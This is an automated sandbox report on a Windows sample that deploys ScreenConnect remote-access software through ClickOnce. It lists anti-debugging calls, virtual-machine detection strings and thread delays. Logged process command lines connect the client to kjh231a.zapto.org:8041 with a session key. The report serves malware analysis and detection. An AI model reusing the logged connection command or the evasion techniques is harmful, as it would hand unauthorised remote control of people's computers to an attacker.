                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596013Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595793Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595682Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595575Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595187Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595078Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594966Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594859Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594750Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594640Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593545Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593314Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593187Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593077Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592954Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592795Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592684Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592550Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592433Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592280Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592172Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: Amcache.hve.6.drBinary or memory string: VMware
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000001.00000002.2241334465.0000021CEAA36000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2237356712.0000021CE89F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2607356741.000002074AC54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2605932091.000002074562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605859392.000001E11B0D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605455938.000001E11B02F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1809581560.000000000102D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: svchost.exe, 00000008.00000002.2606377277.000001E11BE0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMWare
                  Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_0091191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0091191F
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00911000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00911000
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00913677 mov eax, dword ptr fs:[00000030h]0_2_00913677
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00916893 GetProcessHeap,0_2_00916893
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00911493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00911493
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_0091191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0091191F
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00914573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00914573
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00911AAC SetUnhandledExceptionFilter,0_2_00911AAC
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7648 -ip 7648Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7648 -s 748Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=%2f&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\q3jdg51v.apm\a1ebh2z2.xz4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=%2f&i=untitled%20session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\q3jdg51v.apm\a1ebh2z2.xz4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=%2f&i=untitled%20session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\q3jdg51v.apm\a1ebh2z2.xz4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=%2f&i=untitled%20session" "1"Jump to behavior
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1741616097.0000000000F72000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1741616097.0000000000F72000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00911BD4 cpuid 0_2_00911BD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
